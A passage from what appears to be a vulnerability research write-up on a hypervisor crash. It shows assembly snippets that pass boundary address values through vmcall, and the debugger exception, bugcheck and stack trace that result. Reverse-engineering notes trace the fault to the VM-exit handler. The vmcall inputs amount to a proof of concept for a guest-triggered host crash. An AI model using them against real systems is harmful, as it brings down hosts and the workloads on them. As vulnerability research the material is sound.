<span style="background-color: white; color: blue; font-family: Consolas; font-size: 9.5pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">mov</span><span style="background-color: white; color: black; font-family: Consolas; font-size: 9.5pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: maroon; font-family: Consolas; font-size: 9.5pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">rdx</span><span style="background-color: white; color: black; font-family: Consolas; font-size: 9.5pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">, </span><span style="background-color: white; color: navy; font-family: Consolas; font-size: 9.5pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">0</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: black; font-family: Consolas; font-size: 9.5pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: blue; font-family: Consolas; font-size: 9.5pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">mov</span><span style="background-color: white; color: black; font-family: Consolas; font-size: 9.5pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: maroon; font-family: Consolas; font-size: 9.5pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">r8</span><span style="background-color: white; color: black; font-family: Consolas; font-size: 9.5pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">,</span><span style="background-color: white; color: navy; font-family: Consolas; font-size: 9.5pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">1</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt;">
<span style="background-color: white; color: black; font-family: Consolas; font-size: 9.5pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: black; font-family: Consolas; font-size: 9.5pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">vmcall</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">range 1..40 (middle value):</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;">
<span style="background-color: white; color: blue; font-family: Consolas; font-size: 9.5pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">mov</span><span style="background-color: white; color: black; font-family: Consolas; font-size: 9.5pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: maroon; font-family: Consolas; font-size: 9.5pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">rdx</span><span style="background-color: white; color: black; font-family: Consolas; font-size: 9.5pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">, </span><span style="background-color: white; color: navy; font-family: Consolas; font-size: 9.5pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">FFFFFEh</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: black; font-family: Consolas; font-size: 9.5pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: blue; font-family: Consolas; font-size: 9.5pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">mov</span><span style="background-color: white; color: black; font-family: Consolas; font-size: 9.5pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: maroon; font-family: Consolas; font-size: 9.5pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">r8</span><span style="background-color: white; color: black; font-family: Consolas; font-size: 9.5pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">,</span><span style="background-color: white; color: navy; font-family: Consolas; font-size: 9.5pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> FFFFFFh</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt;">
<span style="background-color: white; color: black; font-family: Consolas; font-size: 9.5pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: black; font-family: Consolas; font-size: 9.5pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">vmcall</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">range 1..40 (max value): </span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: blue; font-family: Consolas; font-size: 9.5pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">mov</span><span style="background-color: white; color: black; font-family: Consolas; font-size: 9.5pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: maroon; font-family: Consolas; font-size: 9.5pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">rdx</span><span style="background-color: white; color: black; font-family: Consolas; font-size: 9.5pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">, </span><span style="background-color: white; color: navy; font-family: Consolas; font-size: 9.5pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">FFFFFFFFFFh</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: black; font-family: Consolas; font-size: 9.5pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: blue; font-family: Consolas; font-size: 9.5pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">mov</span><span style="background-color: white; color: black; font-family: Consolas; font-size: 9.5pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: maroon; font-family: Consolas; font-size: 9.5pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">r8</span><span style="background-color: white; color: black; font-family: Consolas; font-size: 9.5pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">,</span><span style="background-color: white; color: navy; font-family: Consolas; font-size: 9.5pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">FFFFFFFFFEh</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt;">
<span style="background-color: white; color: black; font-family: Consolas; font-size: 9.5pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: black; font-family: Consolas; font-size: 9.5pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">vmcall</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">range 41..52 (min value): </span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;">
<span style="background-color: white; color: blue; font-family: Consolas; font-size: 9.5pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">mov</span><span style="background-color: white; color: black; font-family: Consolas; font-size: 9.5pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: maroon; font-family: Consolas; font-size: 9.5pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">rdx</span><span style="background-color: white; color: black; font-family: Consolas; font-size: 9.5pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">, </span><span style="background-color: transparent; color: navy; font-family: Consolas; font-size: 9.5pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">10000000000</span><span style="background-color: white; color: navy; font-family: Consolas; font-size: 9.5pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">h</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: black; font-family: Consolas; font-size: 9.5pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: blue; font-family: Consolas; font-size: 9.5pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">mov</span><span style="background-color: white; color: black; font-family: Consolas; font-size: 9.5pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: maroon; font-family: Consolas; font-size: 9.5pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">r8</span><span style="background-color: white; color: black; font-family: Consolas; font-size: 9.5pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">,</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: navy; font-family: Consolas; font-size: 9.5pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">10000000001</span><span style="background-color: white; color: navy; font-family: Consolas; font-size: 9.5pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">h</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt;">
<span style="background-color: white; color: black; font-family: Consolas; font-size: 9.5pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: black; font-family: Consolas; font-size: 9.5pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">vmcall</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">range 41..52 (middle value)</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: blue; font-family: Consolas; font-size: 9.5pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">mov</span><span style="background-color: white; color: black; font-family: Consolas; font-size: 9.5pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: maroon; font-family: Consolas; font-size: 9.5pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">rdx</span><span style="background-color: white; color: black; font-family: Consolas; font-size: 9.5pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">, </span><span style="background-color: white; color: navy; font-family: Consolas; font-size: 9.5pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">200000000000h</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: black; font-family: Consolas; font-size: 9.5pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: blue; font-family: Consolas; font-size: 9.5pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">mov</span><span style="background-color: white; color: black; font-family: Consolas; font-size: 9.5pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: maroon; font-family: Consolas; font-size: 9.5pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">r8</span><span style="background-color: white; color: black; font-family: Consolas; font-size: 9.5pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">, </span><span style="background-color: white; color: navy; font-family: Consolas; font-size: 9.5pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">200000000001h</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: black; font-family: Consolas; font-size: 9.5pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: black; font-family: Consolas; font-size: 9.5pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">vmcall</span><span style="background-color: white; color: black; font-family: Consolas; font-size: 9.5pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span></div>
<br /><div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">range 41..52 (max value)</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: blue; font-family: Consolas; font-size: 9.5pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">mov</span><span style="background-color: white; color: black; font-family: Consolas; font-size: 9.5pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: maroon; font-family: Consolas; font-size: 9.5pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">rdx</span><span style="background-color: white; color: black; font-family: Consolas; font-size: 9.5pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">, </span><span style="background-color: transparent; color: navy; font-family: Consolas; font-size: 9.5pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">FFFFFFFFFFFE</span><span style="background-color: white; color: navy; font-family: Consolas; font-size: 9.5pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">h</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: black; font-family: Consolas; font-size: 9.5pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: blue; font-family: Consolas; font-size: 9.5pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">mov</span><span style="background-color: white; color: black; font-family: Consolas; font-size: 9.5pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: maroon; font-family: Consolas; font-size: 9.5pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">r8</span><span style="background-color: white; color: black; font-family: Consolas; font-size: 9.5pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">, FFFFFFFFFFFF</span><span style="background-color: white; color: navy; font-family: Consolas; font-size: 9.5pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">h</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: black; font-family: Consolas; font-size: 9.5pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: black; font-family: Consolas; font-size: 9.5pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">vmcall</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Consolas; font-size: 9.5pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">On the middle value of the 41..52 range we see an exception in the debugger attached to the hypervisor (therefore there is no need to test the 53..64 range):</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">FFFFF800060F133F: The instruction at 0xFFFFF800060F133F referenced memory at 0x0. The memory could not be written -> 0000000000000000 (exc.code c0000005, tid 1). </span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">If we continue execution, the hypervisor will hang. Under VMware it simply hangs; on a physical host we get a BSOD:</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">1: kd> !analyze -v</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">HYPERVISOR_ERROR (20001)</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">The hypervisor has encountered a fatal error.</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Arguments:</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Arg1: 0000000000000011</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Arg2: 00000000002b433f</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Arg3: 0000000000001005</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Arg4: ffffe80100203b60</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Stack:</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">1: kd> k</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Child-SP RetAddr Call Site</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">fffff880`02e0bbd8 fffff801`4ab7094c nt!KeBugCheckEx</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">fffff880`02e0bbe0 fffff801`4abdf0a8 nt!HvlNmiCallbackRoutine+0x54</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">fffff880`02e0bc20 fffff801`4aa5c102 nt! ?? ::FNODOBFM::`string'+0x14702</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">fffff880`02e0bc70 fffff801`4aa5bf73 nt!KxNmiInterrupt+0x82</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">fffff880`02e0bdb0 fffff801`4aba0664 nt!KiNmiInterrupt+0x173</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">fffff880`02e29890 fffff801`4aab22ec nt!PpmIdleGuestExecute+0x1c</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">fffff880`02e298c0 fffff801`4aab1be0 nt!PpmIdleExecuteTransition+0x47b</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">fffff880`02e29ae0 fffff801`4aa8898c nt!PoIdle+0x460</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">fffff880`02e29c60 00000000`00000000 nt!KiIdleLoop+0x2c</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">mBSOD_Handle64VmcallMemory is the function in which we see the BSOD.</span></div>
<br /><div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: center;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><img height="300" src="https://lh5.googleusercontent.com/f18ZB_CnKZYCwRnLJQZwVhkKYiHDz598Qq9yKFV27qFyn-e2FQT2AMVqMc18vSiyuW8SrC8dRYIaHvWzdEFJdDVBggiBmqlTBj4cjUwUuCYNahdXjuOrMSdAQu4QyF4FFxRPfcbB7RoQol4-nQ" style="-webkit-transform: rotate(0.00rad); border: none; transform: rotate(0.00rad);" width="475" /></span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Let's find out the exact conditions for the BSOD. On the </span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">mov r8, [r8+rax*8]</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> instruction, which caused the BSOD, the registers are:</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">WINDBG>r @r8</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">r8=ffffc80000000000</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">WINDBG>r @rax</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">rax=0000000200000000 – </span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">input_gpa</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> shr 0xC</span></div>
<br /><div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Go up through the xrefs and name every parent function mBSOD_L<№>. When we reach the mBSOD_L3 function, we see that it is called from mParseVMExit.</span></div>
<br /><div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: center;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><img height="73" src="https://lh6.googleusercontent.com/yU_HFTfy1XqhkbrYASlHcOHOE0Rtyatp4cyUZmLa3kko2LUPKvs0Bd8iXbQLci6F741URNMW4HicXWDniIisVQ-Bd8hoVLuI_708Od4JySX5AQNC58azQWsEzmlOOlFdACvQ_zr5yCkDT_lu1Q" style="-webkit-transform: rotate(0.00rad); border: none; transform: rotate(0.00rad);" width="244" /></span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">At address 0xffffc80000000000 we see a structure that contains SPA entries describing the guest OS address space: one element (8 bytes) per guest OS physical page. </span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
